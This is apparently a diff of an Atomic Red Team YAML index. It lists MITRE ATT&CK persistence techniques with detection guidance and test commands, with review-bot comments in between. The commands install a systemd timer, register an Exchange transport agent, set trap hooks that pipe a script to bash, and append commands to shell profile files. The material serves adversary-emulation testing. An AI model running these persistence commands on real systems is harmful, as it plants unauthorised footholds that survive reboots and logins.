#{path_to_systemd_service} + echo "[Unit]" > #{path_to_systemd_timer} + echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} + echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "[Timer]" >> #{path_to_systemd_timer} + echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} + echo "[Install]" >> #{path_to_systemd_timer} + echo "WantedBy=timers.target" >> 
#{path_to_systemd_timer} + systemctl start #{systemd_timer_name} + systemctl enable #{systemd_timer_name} + systemctl daemon-reload + cleanup_command: | + systemctl stop #{systemd_timer_name} + systemctl disable #{systemd_timer_name} + rm #{path_to_systemd_service} + rm #{path_to_systemd_timer} + systemctl daemon-reload + name: bash + T1542.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1542.005 + url: https://attack.mitre.org/techniques/T1542/005 + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Secure Boot + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure + Boot. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Command History + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command + History. Retrieved October 21, 2020. 
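Review bot: in the T1053.006 Create Systemd Service and Timer executor, `systemctl daemon-reload` runs after `systemctl start` and `systemctl enable`, so the freshly written unit files are started and enabled before the manager has been asked to re-read them; move daemon-reload to immediately after the last echo, as the T1543.002 service test does. As with that test, writing to /etc/systemd/system needs root, so `elevation_required: true` should be declared.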
+ - source_name: Cisco IOS Software Integrity Assurance - Boot Information + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot + Information. Retrieved October 21, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: TFTP Boot + description: |- + Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. + + Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. 
(Citation: Cisco Blog Legacy Device Attacks) + id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-10-22T16:35:53.806Z' + created: '2020-10-20T00:06:56.180Z' + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols. 
+ x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Network + atomic_tests: [] + T1547.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.003 + url: https://attack.mitre.org/techniques/T1547/003 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top + description: Microsoft. (2018, February 1). Windows Time Service (W32Time). + Retrieved March 26, 2018. + source_name: Microsoft W32Time Feb 2018 + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://github.com/scottlundgren/w32time + description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, + 2018. + source_name: Github W32Time Oct 2017 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings + description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. + Retrieved March 26, 2018. + source_name: Microsoft W32Time May 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Time Providers + description: |- + Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. 
(Citation: Microsoft TimeProvider) + + Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) + + Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) + id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:24:26.476Z' + created: '2020-01-24T15:51:52.317Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: |- + Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) + + The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. 
(Citation: TechNet Autoruns) + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Scott Lundgren, @5twenty9, Carbon Black + x_mitre_platforms: + - Windows + atomic_tests: [] + T1205: + technique: + created: '2018-04-18T17:59:24.739Z' + modified: '2021-02-17T14:23:49.495Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1205 + url: https://attack.mitre.org/techniques/T1205 + - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 + description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible + backdoor. Retrieved October 13, 2018.' + source_name: Hartrell cd00r 2002 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. 
+ - source_name: Bleeping Computer - Ryuk WoL + url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ + description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan + To Encrypt Offline Devices. Retrieved February 11, 2021. + - source_name: AMD Magic Packet + url: https://www.amd.com/system/files/TechDocs/20213.pdf + description: AMD. (1995, November 1). Magic Packet Technical White Paper. + Retrieved February 17, 2021. + - source_name: GitLab WakeOnLAN + url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN + description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February + 17, 2021. + description: |- + Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. + + Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). + + The observation of the signal packets to trigger the communication can be conducted through different methods. 
One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) + name: Traffic Signaling + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + revoked: false + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_defense_bypassed: + - Defensive network service scanning + x_mitre_detection: |- + Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. + + The Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. 
Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN) + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Josh Day, Gigamon + atomic_tests: [] + T1505.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1505.002 + url: https://attack.mitre.org/techniques/T1505/002 + - source_name: Microsoft TransportAgent Jun 2016 + url: https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + description: Microsoft. (2016, June 1). Transport agents. Retrieved June 24, + 2019. + - source_name: ESET LightNeuron May 2019 + url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf + description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from + remote code execution. Retrieved June 24, 2019.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Transport Agent + description: "Adversaries may abuse Microsoft transport agents to establish + persistent access to systems. Microsoft Exchange transport agents can operate + on email messages passing through the transport pipeline to perform various + tasks such as filtering spam, filtering malicious attachments, journaling, + or adding a corporate signature to the end of all outgoing emails.(Citation: + Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport + agents can be written by application developers and then compiled to .NET + assemblies that are subsequently registered with the Exchange server. 
Transport + agents will be invoked during a specified stage of email processing and carry + out developer defined tasks. \n\nAdversaries may register a malicious transport + agent to provide a persistence mechanism in Exchange Server that can be triggered + by adversary-specified email events.(Citation: ESET LightNeuron May 2019) + Though a malicious transport agent may be invoked for all emails passing through + the Exchange transport pipeline, the agent can be configured to only carry + out specific tasks in response to adversary defined criteria. For example, + the transport agent may only carry out an action like copying in-transit attachments + and saving them for later exfiltration if the recipient email address matches + an entry on a list provided by the adversary. " + id: attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-25T22:59:59.124Z' + created: '2019-12-12T15:08:20.972Z' + x_mitre_detection: Consider monitoring application logs for abnormal behavior + that may indicate suspicious installation of application software components. + Consider monitoring file locations associated with the installation of new + application software components such as paths from which applications typically + load such extensible components. + x_mitre_data_sources: + - 'File: File Creation' + - 'Application Log: Application Log Content' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - SYSTEM + - Administrator + - root + x_mitre_contributors: + - ESET + - " Christoffer Strömblad" + x_mitre_platforms: + - Linux + - Windows + identifier: T1505.002 + atomic_tests: + - name: Install MS Exchange Transport Agent Persistence + auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d + description: | + Install a Microsoft Exchange Transport Agent for persistence. 
This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. + More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + supported_platforms: + - windows + input_arguments: + class_factory: + description: Class factory of transport agent. + type: string + default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory + dll_path: + description: Path of DLL to use as transport agent. + type: path + default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll + transport_agent_identity: + description: Friendly name of transport agent once installed. + type: string + default: Security Interop Agent + dependencies: + - description: 'Microsoft Exchange SnapIn must be installed + +' + prereq_command: 'Get-TransportAgent -TransportService FrontEnd + +' + get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn + +' + executor: + command: | + Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} + Enable-TransportAgent #{transport_agent_identity} + Get-TransportAgent | Format-List Name,Enabled + cleanup_command: | + if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ + Disable-TransportAgent #{transport_agent_identity} + Uninstall-TransportAgent #{transport_agent_identity} + Get-TransportAgent + } + name: powershell + elevation_required: true + T1546.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.005 + url: https://attack.mitre.org/techniques/T1546/005 + - source_name: Trap Manual + url: https://ss64.com/bash/trap.html + description: ss64. (n.d.). trap. Retrieved May 21, 2019. + - source_name: Cyberciti Trap Statements + url: https://bash.cyberciti.biz/guide/Trap_statement + description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, + 2019. 
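Review bot: in the T1505.002 Install MS Exchange Transport Agent Persistence executor and cleanup, `#{transport_agent_identity}` (default "Security Interop Agent") and `#{dll_path}` (default under "c:\program files\...") are interpolated unquoted into Install-TransportAgent, Enable-TransportAgent, Disable-TransportAgent and Uninstall-TransportAgent, so PowerShell splits them on the spaces and the commands fail with the default arguments; wrap each as `-Name "#{transport_agent_identity}"` and `-AssemblyPath "#{dll_path}"`. Minor: the x_mitre_contributors entry `" Christoffer Strömblad"` carries a leading space.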
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Trap + description: |- + Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. + + Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) + id: attack-pattern--63220765-d418-44de-8fae-694b3912317d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T16:43:02.273Z' + created: '2020-01-24T14:17:43.906Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: Trap commands must be registered for the shell or programs, + so they appear in files. Monitoring files for suspicious or overly broad trap + commands can narrow down suspicious behavior during an investigation. Monitor + for suspicious processes executed through trap interrupts. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - macOS + - Linux + identifier: T1546.005 + atomic_tests: + - name: Trap + auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 + description: | + After exiting the shell, the script will download and execute. 
+ After sending a keyboard interrupt (CTRL+C) the script will download and execute. + supported_platforms: + - macos + - linux + executor: + command: | + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT + exit + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt + name: sh + T1546.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.004 + url: https://attack.mitre.org/techniques/T1546/004 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: bencane blog bashrc + url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/ + description: Benjamin Cane. (2013, September 16). Understanding a little more + about /etc/profile and /etc/bashrc. Retrieved February 25, 2021. + - source_name: anomali-rocke-tactics + url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect + description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining + Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved + December 17, 2020. + - source_name: Linux manual bash invocation + url: https://wiki.archlinux.org/index.php/Bash#Invocation + description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021. + - source_name: Tsunami + url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware + Targets DVRs, Forms Botnet. Retrieved December 17, 2020. + - source_name: anomali-linux-rabbit + url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat + description: Anomali Threat Research. 
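Review bot: in the T1546.005 Trap executor, the `exit` on the second line ends the sh session before the third line runs, so the SIGINT trap is never registered and the description's second claim (download and execute on CTRL+C) is not exercised; register the SIGINT trap before `exit`, or split the two triggers into separate tests. The signal name `SIGINt` is also inconsistently capitalised; since the executor is `sh`, the portable spelling is `INT`.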
(2018, December 6). Pulling Linux Rabbit/Rabbot + Malware Out of a Hat. Retrieved December 17, 2020. + - source_name: Magento + url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html + description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection + Vector. Retrieved December 17, 2020. + - source_name: ScriptingOSX zsh + url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/ + description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration + Files. Retrieved February 25, 2021.' + - source_name: PersistentJXA_leopitt + url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5 + description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell + for macOS. Retrieved January 11, 2021. + - source_name: code_persistence_zsh + url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js + description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. + Retrieved January 11, 2021. + - source_name: ESF_filemonitor + url: https://objective-see.com/blog/blog_0x48.html + description: Patrick Wardle. (2019, September 17). Writing a File Monitor + with Apple's Endpoint Security Framework. Retrieved December 17, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Unix Shell Configuration Modification + description: "Adversaries may establish persistence through executing malicious + commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s + execute several configuration scripts at different points throughout the session + based on events. For example, when a user opens a command-line interface or + remotely logs in (such as via SSH) a login shell is initiated. 
The login shell + executes scripts from the system (/etc) and the user’s home directory + (~/) to configure the environment. All login shells on a system + use /etc/profile when initiated. These configuration scripts run at the permission + level of their directory and are often used to set environment variables, + create aliases, and customize the user’s environment. When the shell exits + or terminates, additional shell scripts are executed to ensure the shell exits + appropriately. \n\nAdversaries may attempt to establish persistence by inserting + commands into scripts automatically executed by shells. Using bash as an example, + the default shell for most GNU/Linux systems, adversaries may add commands + that launch malicious binaries into the /etc/profile and /etc/profile.d + files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These + files typically require root permissions to modify and are executed each time + any shell on a system launches. For user level permissions, adversaries can + insert malicious commands into ~/.bash_profile, ~/.bash_login, + or ~/.profile which are sourced when a user opens a command-line + interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: + Linux manual bash invocation) Since the system only executes the first existing + file in the listed order, adversaries have used ~/.bash_profile + to ensure execution. Adversaries have also leveraged the ~/.bashrc + file which is additionally executed if the connection is established remotely + or an additional interactive shell is opened, such as a new tab in the command-line + interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: + Magento) Some malware targets the termination of a program to trigger execution, + adversaries can use the ~/.bash_logout file to execute malicious + commands at the end of a session. 
\n\nFor macOS, the functionality of this + technique is similar but may leverage zsh, the default shell for macOS 10.15+. + When the Terminal.app is opened, the application launches a zsh login shell + and a zsh interactive shell. The login shell configures the system environment + using /etc/profile, /etc/zshenv, /etc/zprofile, + and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: + code_persistence_zsh) The login shell then configures the user environment + with ~/.zprofile and ~/.zlogin. The interactive + shell uses the ~/.zshrc to configure the user environment. Upon + exiting, /etc/zlogout and ~/.zlogout are executed. + For legacy programs, macOS executes /etc/bashrc on startup." + id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T15:22:54.089Z' + created: '2020-01-24T14:13:45.936Z' + x_mitre_contributors: + - Robert Wilson + - Tony Lambert, Red Canary + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: "While users may customize their shell profile files, there + are only certain types of commands that typically appear in these files. Monitor + for abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network when user profiles are loaded + during the login process.\n\nMonitor for changes to /etc/profile + and /etc/profile.d, these files should only be modified by system + administrators. 
MacOS users can leverage Endpoint Security Framework file + events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor + most Linux and macOS systems, a list of file paths for valid shell options + available on a system are located in the /etc/shells file.\n" + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1546.004 + atomic_tests: + - name: Add command to .bash_profile + auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f + description: 'Adds a command to the .bash_profile file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bash_profile file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bash_profile + +' + name: sh + - name: Add command to .bashrc + auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f + description: 'Adds a command to the .bashrc file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bashrc file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bashrc + +' + name: sh + T1078: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078 + url: https://attack.mitre.org/techniques/T1078 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. 
+ source_name: TechNet Credential Theft + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. 
(Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-12T18:27:52.298Z' + created: '2017-05-31T21:31:00.645Z' + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. 
